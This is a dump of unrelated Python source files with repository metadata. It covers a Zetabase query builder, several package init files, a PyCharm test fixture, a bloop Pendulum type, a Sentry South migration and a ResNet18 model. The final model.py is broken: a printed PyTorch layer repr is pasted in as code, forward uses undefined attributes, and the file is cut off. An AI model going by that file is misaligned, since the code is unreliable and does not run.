80a7d6bc150486e67f8dff2ae65aaab135d69c2f
|
[
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
zbpy/basicqueries.py
|
zetabase/zbpy
|
80a7d6bc150486e67f8dff2ae65aaab135d69c2f
|
[
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
from . import zbprotocol_pb2
class QueryAnd():
def __init__(self, left, right):
"""
Initializes QueryAnd object.
Parameters:
left: SubQueryConvertible
right: SubQueryConvertible
"""
self.left = left #SubQueryConvertible
self.right = right #SubQueryConvertible
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
return zbprotocol_pb2.TableSubQuery(
isCompound=True,
compoundOperator=zbprotocol_pb2.QueryLogicalOperator.LOGICAL_AND,
compoundLeft=self.left.to_sub_query(),
compoundRight=self.right.to_sub_query(),
comparison=None
)
class QueryOr():
def __init__(self, left, right):
"""
Initializes QueryOr object.
Parameters:
left: SubQueryConvertible
right: SubQueryConvertible
"""
self.right = right #SubQueryConvertible
self.left = left #SubQueryConvertible
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
return zbprotocol_pb2.TableSubQuery(
isCompound=True,
compoundOperator=zbprotocol_pb2.QueryLogicalOperator.LOGICAL_OR,
compoundLeft=self.left.to_sub_query(),
compoundRight=self.right.to_sub_query(),
comparison=None
)
class QueryEquals():
def __init__(self, field, comp_value):
"""
Initializes QueryEquals object.
Parameters:
field: string
comp_value: any (sorta)
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.EQUALS,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryNotEqual():
def __init__(self, field, comp_value):
"""
Initializes QueryEquals object.
Parameters:
field: string
comp_value: any (sorta)
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.NOT_EQUALS,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryGreaterThan():
def __init__(self, field, comp_value):
"""
Initializes QueryGreaterThan object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Return TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.GREATER_THAN,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryGreaterThanEqual():
def __init__(self, field, comp_value):
"""
Initializes QueryGreaterThanEqual object.
Parameters:
field: string
value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns a TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.GREATER_THAN_EQ,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryLessThan():
def __init__(self, field, comp_value):
"""
Initializes QuerylessThan object
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns a TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.LESS_THAN,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryLessThanEqual():
def __init__(self, field, comp_value):
"""
Initializes QueryLessThanEqual object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.LESS_THAN_EQ,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryTextSearch():
def __init__(self, field, comp_value):
"""
Initializes QueryTextSearch object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
q_order = zbprotocol_pb2.QueryOrdering.FULL_TEXT
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.TEXT_SEARCH,
field=field,
value=value_str,
ordering=q_order
)
)
def query_object_typify(value):
"""
Returns string, QueryOrdering.
Parameters:
value: any
"""
q_order = zbprotocol_pb2.QueryOrdering.LEXICOGRAPHIC
if isinstance(value, int) or isinstance(value, float):
q_order = zbprotocol_pb2.QueryOrdering.REAL_NUMBERS
value_str = str(value)
else:
value_str = str(value)
return value_str, q_order
| 27.345515
| 77
| 0.563723
| 721
| 8,231
| 6.174757
| 0.104022
| 0.068733
| 0.040881
| 0.02628
| 0.88814
| 0.862309
| 0.834232
| 0.763702
| 0.755391
| 0.755391
| 0
| 0.006869
| 0.363261
| 8,231
| 301
| 78
| 27.345515
| 0.842587
| 0.152715
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109195
| false
| 0
| 0.005747
| 0
| 0.224138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52c78318354f76710484c56eb6d49370c354aa19
| 127
|
py
|
Python
|
jj/http/__init__.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 4
|
2020-09-08T08:14:21.000Z
|
2022-01-27T19:22:53.000Z
|
jj/http/__init__.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 19
|
2018-02-13T05:51:25.000Z
|
2022-03-27T22:48:11.000Z
|
jj/http/__init__.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 3
|
2017-11-17T13:25:23.000Z
|
2022-02-03T12:57:00.000Z
|
from .codes import * # noqa: F401, F403
from .headers import * # noqa: F401, F403
from .methods import * # noqa: F401, F403
| 31.75
| 42
| 0.669291
| 18
| 127
| 4.722222
| 0.444444
| 0.352941
| 0.494118
| 0.635294
| 0.517647
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18
| 0.212598
| 127
| 3
| 43
| 42.333333
| 0.67
| 0.393701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
5e0978fca6216486da96347e01a64ff5c5caeabf
| 136
|
py
|
Python
|
canbeta/child/nodes/__init__.py
|
FROM-THE-EARTH/canbeta
|
d41cf1b3dd926c5144dc5086f42943a0594c478b
|
[
"MIT"
] | 1
|
2021-06-27T10:50:37.000Z
|
2021-06-27T10:50:37.000Z
|
canbeta/child/nodes/__init__.py
|
FROM-THE-EARTH/canbeta
|
d41cf1b3dd926c5144dc5086f42943a0594c478b
|
[
"MIT"
] | 5
|
2021-06-19T08:33:47.000Z
|
2021-06-19T08:59:30.000Z
|
canbeta/child/nodes/__init__.py
|
FROM-THE-EARTH/canbeta
|
d41cf1b3dd926c5144dc5086f42943a0594c478b
|
[
"MIT"
] | null | null | null |
from can09.child.nodes.child_server_node import ChildServerNode
from can09.child.nodes.mission_standby_node import MissionStandbyNode
| 27.2
| 69
| 0.882353
| 18
| 136
| 6.444444
| 0.611111
| 0.155172
| 0.241379
| 0.327586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.073529
| 136
| 4
| 70
| 34
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e17b8938bf770c704a3fe619f707e07ea52cf37
| 330
|
py
|
Python
|
yowsup/layers/protocol_presence/protocolentities/__init__.py
|
rihbyne/yowsup
|
06581618fdba54aa51041624e19d5dce64b054ef
|
[
"MIT"
] | 1
|
2019-12-16T11:00:06.000Z
|
2019-12-16T11:00:06.000Z
|
yowsup/layers/protocol_presence/protocolentities/__init__.py
|
pasinit/yowsup
|
894007650bf3d75ef7af4a0e57e84dc7cccc4dfe
|
[
"MIT"
] | null | null | null |
yowsup/layers/protocol_presence/protocolentities/__init__.py
|
pasinit/yowsup
|
894007650bf3d75ef7af4a0e57e84dc7cccc4dfe
|
[
"MIT"
] | 3
|
2017-08-18T21:24:46.000Z
|
2018-09-07T21:07:39.000Z
|
from .presence import PresenceProtocolEntity
from .presence_available import AvailablePresenceProtocolEntity
from .presence_unavailable import UnavailablePresenceProtocolEntity
from .presence_subscribe import SubscribePresenceProtocolEntity
from .presence_unsubscribe import UnsubscribePresenceProtocolEntity
| 55
| 68
| 0.860606
| 24
| 330
| 11.666667
| 0.5
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124242
| 330
| 5
| 69
| 66
| 0.968858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e1c928b579dafdbae96737c635490afae634714
| 258
|
py
|
Python
|
python/testData/inspections/PyUnresolvedReferencesInspection/UnusedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UnusedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UnusedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
<warning descr="Unused import statement">from my_module import <error descr="Unresolved reference 'eggs'">eggs</error></warning>
<warning descr="Unused import statement">from my_module import <error descr="Unresolved reference 'eggs'">eggs</error></warning>
| 86
| 128
| 0.782946
| 34
| 258
| 5.882353
| 0.352941
| 0.12
| 0.18
| 0.24
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.077519
| 258
| 2
| 129
| 129
| 0.840336
| 0
| 0
| 1
| 0
| 0
| 0.387597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
eaa825d3ea4d037afc3128bfcb68d181c862f970
| 1,391
|
py
|
Python
|
bloop/ext/pendulum.py
|
monoflo/bloop
|
c476298e5a40decf9fdf2ed50df74be8f91fdffd
|
[
"MIT"
] | null | null | null |
bloop/ext/pendulum.py
|
monoflo/bloop
|
c476298e5a40decf9fdf2ed50df74be8f91fdffd
|
[
"MIT"
] | null | null | null |
bloop/ext/pendulum.py
|
monoflo/bloop
|
c476298e5a40decf9fdf2ed50df74be8f91fdffd
|
[
"MIT"
] | null | null | null |
import pendulum
from .. import types
# https://github.com/sdispater/pendulum/issues/97
DEFAULT_TIMEZONE = "utc"
class DateTime(types.DateTime):
python_type = pendulum.Pendulum
def __init__(self, timezone=DEFAULT_TIMEZONE):
self.timezone = timezone
super().__init__()
def dynamo_dump(self, value, *, context, **kwargs):
if value is None:
return None
value = value.in_timezone("utc")
return super().dynamo_dump(value, context=context, **kwargs)
def dynamo_load(self, value, *, context, **kwargs):
if value is None:
return None
dt = super().dynamo_load(value, context=context, **kwargs)
return pendulum.instance(dt).in_timezone(self.timezone)
class Timestamp(types.Timestamp):
python_type = pendulum.Pendulum
def __init__(self, timezone=DEFAULT_TIMEZONE):
self.timezone = timezone
super().__init__()
def dynamo_dump(self, value, *, context, **kwargs):
if value is None:
return None
value = value.in_timezone("utc")
return super().dynamo_dump(value, context=context, **kwargs)
def dynamo_load(self, value, *, context, **kwargs):
if value is None:
return None
dt = super().dynamo_load(value, context=context, **kwargs)
return pendulum.instance(dt).in_timezone(self.timezone)
| 28.979167
| 68
| 0.64486
| 163
| 1,391
| 5.300614
| 0.214724
| 0.111111
| 0.092593
| 0.101852
| 0.837963
| 0.837963
| 0.837963
| 0.837963
| 0.837963
| 0.837963
| 0
| 0.001889
| 0.238677
| 1,391
| 47
| 69
| 29.595745
| 0.813975
| 0.033789
| 0
| 0.848485
| 0
| 0
| 0.006706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.060606
| 0
| 0.606061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eaf0cf989c05432f3fcf643b0e316101ed78ed1d
| 155
|
py
|
Python
|
app/blueprints/cms_main/__init__.py
|
lvyaoo/wx-open-project
|
6f6683c5267fac50b6c8479c148aa1f35cf0f930
|
[
"MIT"
] | null | null | null |
app/blueprints/cms_main/__init__.py
|
lvyaoo/wx-open-project
|
6f6683c5267fac50b6c8479c148aa1f35cf0f930
|
[
"MIT"
] | null | null | null |
app/blueprints/cms_main/__init__.py
|
lvyaoo/wx-open-project
|
6f6683c5267fac50b6c8479c148aa1f35cf0f930
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import Blueprint
bp_cms_main = Blueprint('bp_cms_main', __name__, static_folder='static')
from . import extensions
| 15.5
| 72
| 0.722581
| 21
| 155
| 4.904762
| 0.666667
| 0.213592
| 0.271845
| 0.349515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.148387
| 155
| 9
| 73
| 17.222222
| 0.772727
| 0.135484
| 0
| 0
| 0
| 0
| 0.128788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
dc75ac6b6364ed14d4e0014dc3d7aca8febfc914
| 7,022
|
py
|
Python
|
src/sentry/migrations/0001_initial.py
|
rogerhu/sentry
|
ee2b190e92003abe0f538b2df5b686e425df1200
|
[
"BSD-3-Clause"
] | 2
|
2015-10-14T12:45:32.000Z
|
2016-01-27T03:24:43.000Z
|
src/sentry/migrations/0001_initial.py
|
simmetria/sentry
|
9731f26adb44847d1c883cca108afc0755cf21cc
|
[
"BSD-3-Clause"
] | null | null | null |
src/sentry/migrations/0001_initial.py
|
simmetria/sentry
|
9731f26adb44847d1c883cca108afc0755cf21cc
|
[
"BSD-3-Clause"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupedMessage'
db.create_table('sentry_groupedmessage', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('logger', self.gf('django.db.models.fields.CharField')(default='root', max_length=64, db_index=True, blank=True)),
('class_name', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=128, null=True, blank=True)),
('level', self.gf('django.db.models.fields.PositiveIntegerField')(default=40, db_index=True, blank=True)),
('message', self.gf('django.db.models.fields.TextField')()),
('traceback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('view', self.gf('django.db.models.fields.CharField')(max_length=200, db_index=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
('server_name', self.gf('django.db.models.fields.CharField')(max_length=128, db_index=True)),
('checksum', self.gf('django.db.models.fields.CharField')(max_length=32, db_index=True)),
('status', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
('times_seen', self.gf('django.db.models.fields.PositiveIntegerField')(default=1)),
('last_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, db_index=True)),
('first_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, db_index=True)),
))
db.send_create_signal('sentry', ['GroupedMessage'])
# Adding unique constraint on 'GroupedMessage', fields ['logger', 'view', 'checksum']
db.create_unique('sentry_groupedmessage', ['logger', 'view', 'checksum'])
# Adding model 'Message'
db.create_table('sentry_message', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('logger', self.gf('django.db.models.fields.CharField')(default='root', max_length=64, db_index=True, blank=True)),
('class_name', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=128, null=True, blank=True)),
('level', self.gf('django.db.models.fields.PositiveIntegerField')(default=40, db_index=True, blank=True)),
('message', self.gf('django.db.models.fields.TextField')()),
('traceback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('view', self.gf('django.db.models.fields.CharField')(max_length=200, db_index=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
('server_name', self.gf('django.db.models.fields.CharField')(max_length=128, db_index=True)),
('checksum', self.gf('django.db.models.fields.CharField')(max_length=32, db_index=True)),
('datetime', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, db_index=True)),
('data', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
))
db.send_create_signal('sentry', ['Message'])
def backwards(self, orm):
# Deleting model 'GroupedMessage'
db.delete_table('sentry_groupedmessage')
# Removing unique constraint on 'GroupedMessage', fields ['logger', 'view', 'checksum']
db.delete_unique('sentry_groupedmessage', ['logger', 'view', 'checksum'])
# Deleting model 'Message'
db.delete_table('sentry_message')
models = {
'sentry.groupedmessage': {
'Meta': {'unique_together': "(('logger', 'view', 'checksum'),)", 'object_name': 'GroupedMessage'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'traceback': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'view': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'})
},
'sentry.message': {
'Meta': {'object_name': 'Message'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'traceback': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'view': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
}
}
complete_apps = ['sentry']
| 70.929293
| 144
| 0.606665
| 802
| 7,022
| 5.197007
| 0.100998
| 0.101727
| 0.174664
| 0.24952
| 0.849328
| 0.849328
| 0.816699
| 0.804942
| 0.790787
| 0.724568
| 0
| 0.013483
| 0.176161
| 7,022
| 98
| 145
| 71.653061
| 0.707001
| 0.042011
| 0
| 0.512821
| 0
| 0
| 0.471499
| 0.296473
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.051282
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc786cb3af9264f6501fa56b19d2641e0969fd5f
| 4,954
|
py
|
Python
|
modulo2/2-classificadores/2.4-resnet/model.py
|
fossabot/unifacisa-visao-computacional
|
14aef22a3e7fe10ee820d31ce12ad21a3cad7b0b
|
[
"MIT"
] | null | null | null |
modulo2/2-classificadores/2.4-resnet/model.py
|
fossabot/unifacisa-visao-computacional
|
14aef22a3e7fe10ee820d31ce12ad21a3cad7b0b
|
[
"MIT"
] | null | null | null |
modulo2/2-classificadores/2.4-resnet/model.py
|
fossabot/unifacisa-visao-computacional
|
14aef22a3e7fe10ee820d31ce12ad21a3cad7b0b
|
[
"MIT"
] | 1
|
2021-02-06T00:49:32.000Z
|
2021-02-06T00:49:32.000Z
|
import torch
import torch.nn as nn
import math
class Resnet18(nn.Module):
def __init__(self, num_classes=1000):
super(Resnet18, self).__init__()
ResNet(
(conv1): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
(bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(maxpool): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1, ceil_mode=False)
(layer1): Sequential(
(0): BasicBlock(
(conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(1): BasicBlock(
(conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(layer2): Sequential(
(0): BasicBlock(
(conv1): Conv2d(64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
(0): Conv2d(64, 128, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): BasicBlock(
(conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(layer3): Sequential(
(0): BasicBlock(
(conv1): Conv2d(128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
(0): Conv2d(128, 256, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): BasicBlock(
(conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(layer4): Sequential(
(0): BasicBlock(
(conv1): Conv2d(256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
(0): Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): BasicBlock(
(conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(avgpool): AdaptiveAvgPool2d(output_size=(1, 1))
Linear(in_features=512, out_features=1000, bias=True)
def forward(self, x):
x = self.features(x)
x = torch.flatten(x, 1)
x = self.classifier(x)
return x
| 48.568627
| 94
| 0.628583
| 749
| 4,954
| 4.058745
| 0.096128
| 0.021711
| 0.046053
| 0.098684
| 0.872697
| 0.844079
| 0.826316
| 0.826316
| 0.826316
| 0.826316
| 0
